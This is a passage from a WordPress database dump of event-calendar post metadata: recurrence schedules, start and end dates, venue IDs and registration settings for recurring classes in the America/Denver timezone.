14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(151782,266078,'passster_activate_protection',NULL),(119653,262750,'_EventVenueID','262507'),(119632,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(113012,262750,'_EventStartDate','2021-09-14 19:00:00'),(113013,262750,'_EventStartDateUTC','2021-09-15 01:00:00'),(113014,262750,'_EventEndDate','2021-09-14 20:00:00'),(113015,262750,'_EventEndDateUTC','2021-09-15 02:00:00'),(113016,262750,'_EventDuration','3600'),(119636,262750,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119685,262751,'_RTEClimitRegistrations','0'),(119688,262751,'_EventVenueID','262507'),(119689,262751,'_wp_old_slug','boulder-easy-way-class'),(119690,262751,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119691,262751,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119624,262750,'_EventOrigin','events-calendar'),(119625,262750,'_EventOrigin','events-calendar'),(119626,262750,'_EventOrigin','events-calendar'),(119675,262751,'_EventCurrencyPosition','prefix'),(119674,262751,'_EventCurrencySymbol',''),(119628,262750,'_EventOrigin','events-calendar'),(119629,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119683,262751,'_RTECdeadlineType','start'),(119684,262751,'_RTECwhoCanRegister','any'),(119654,262750,'_wp_old_slug','boulder-easy-way-class'),(119615,262749,'_RTEClimitRegistrations','0'),(119616,262749,'_RTECmaxRegistrations','30'),(119600,262749,'boldgrid_hide_page_title','1'),(119635,262750,'boldgrid_hide_page_title','1'),(119641,262750,'_EventCost',''),(119618,262749,'_EventVenueID','262507'),(119619,262749,'_wp_old_slug','boulder-easy-way-class'),(119620,262749,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119621,262749,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119642,262750,'_EventURL',''),(119643,262750,'_EventTimezone','America/Denver'),(119644,262750,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119645,262750,'_dp_original','225321'),(119646,262750,'protect_children',''),(119647,262750,'_RTECregistrationsDisabled','1'),(119633,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119648,262750,'_RTECdeadlineType','start'),(119649,262750,'_RTECwhoCanRegister','any'),(119650,262750,'_RTEClimitRegistrations','0'),(119630,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119656,262750,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119651,262750,'_RTECmaxRegistrations','30'),(119634,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(120898,263177,'_RTECdeadlineType','start'),(119637,262750,'_EventShowMapLink','1'),(119638,262750,'_EventShowMap','1'),(119639,262750,'_EventCurrencySymbol',''),(119640,262750,'_EventCurrencyPosition','prefix'),(112970,262749,'_EventStartDateUTC','2021-08-11 01:00:00'),(112971,262749,'_EventEndDate','2021-08-10 20:00:00'),(112972,262749,'_EventEndDateUTC','2021-08-11 02:00:00'),(112973,262749,'_EventDuration','3600'),(119607,262749,'_EventURL',''),(119608,262749,'_EventTimezone','America/Denver'),(122488,263255,'_RTEClimitRegistrations','0'),(120869,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(125431,263328,'protect_children',''),(122114,263245,'boldgrid_hide_page_title','1'),(122132,263245,'_wp_old_slug','soul-travel-2-class'),(122133,263245,'_wp_old_slug','the-easy-way'),(122134,263245,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(119676,262751,'_EventCost',''),(119677,262751,'_EventURL',''),(119678,262751,'_EventTimezone','America/Denver'),(119665,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119679,262751,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119680,262751,'_dp_original','225321'),(119658,262751,'_EventOrigin','events-calendar'),(119659,262751,'_EventOrigin','events-calendar'),(119660,262751,'_EventOrigin','events-calendar'),(119661,262751,'_EventOrigin','events-calendar'),(119662,262751,'_EventOrigin','events-calendar'),(119663,262751,'_EventOrigin','events-calendar'),(119664,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119657,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(122116,263245,'_EventShowMapLink','1'),(122119,263245,'_EventCurrencyPosition','prefix'),(122120,263245,'_EventCost',''),(122121,263245,'_EventURL',''),(128868,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128892,263459,'_EventShowMapLink',''),(122467,263255,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122465,263255,'_EventEndDateUTC','2021-10-03 19:30:00'),(122470,263255,'_EventOrigin','events-calendar'),(122466,263255,'_EventDuration','5400'),(122128,263245,'_RTEClimitRegistrations','0'),(122108,263245,'_EventOrigin','events-calendar'),(122109,263245,'_EventOrigin','events-calendar'),(122102,263245,'_EventStartDate','2020-12-06 12:00:00'),(122103,263245,'_EventStartDateUTC','2020-12-06 19:00:00'),(122104,263245,'_EventEndDate','2020-12-06 13:30:00'),(122105,263245,'_EventEndDateUTC','2020-12-06 20:30:00'),(122106,263245,'_EventDuration','5400'),(122107,263245,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628577;s:16:\"tribe_events_cat\";i:1610653777;}'),(122110,263245,'_EventOrigin','events-calendar'),(122111,263245,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628577;s:16:\"tribe_events_cat\";i:1610653777;}'),(122117,263245,'_EventShowMap','1'),(122118,263245,'_EventCurrencySymbol',''),(114485,262792,'_EventEndDateUTC','2021-02-21 17:10:00'),(114484,262792,'_EventEndDate','2021-02-21 10:10:00'),(122112,263245,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628577;s:16:\"tribe_events_cat\";i:1610653777;}'),(128903,263459,'_EventTimezone','America/Denver'),(122237,263248,'_RTECmaxRegistrations','30'),(122236,263248,'_RTEClimitRegistrations','0'),(122216,263248,'_EventOrigin','events-calendar'),(122217,263248,'_EventOrigin','events-calendar'),(122210,263248,'_EventStartDate','2021-03-07 12:00:00'),(122211,263248,'_EventStartDateUTC','2021-03-07 19:00:00'),(122212,263248,'_EventEndDate','2021-03-07 13:30:00'),(122213,263248,'_EventEndDateUTC','2021-03-07 20:30:00'),(122214,263248,'_EventDuration','5400'),(122215,263248,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122218,263248,'_EventOrigin','events-calendar'),(122219,263248,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122225,263248,'_EventShowMap','1'),(122229,263248,'_EventURL',''),(122230,263248,'_EventTimezone','America/Denver'),(122231,263248,'_dp_original','201534'),(122232,263248,'protect_children',''),(122220,263248,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s: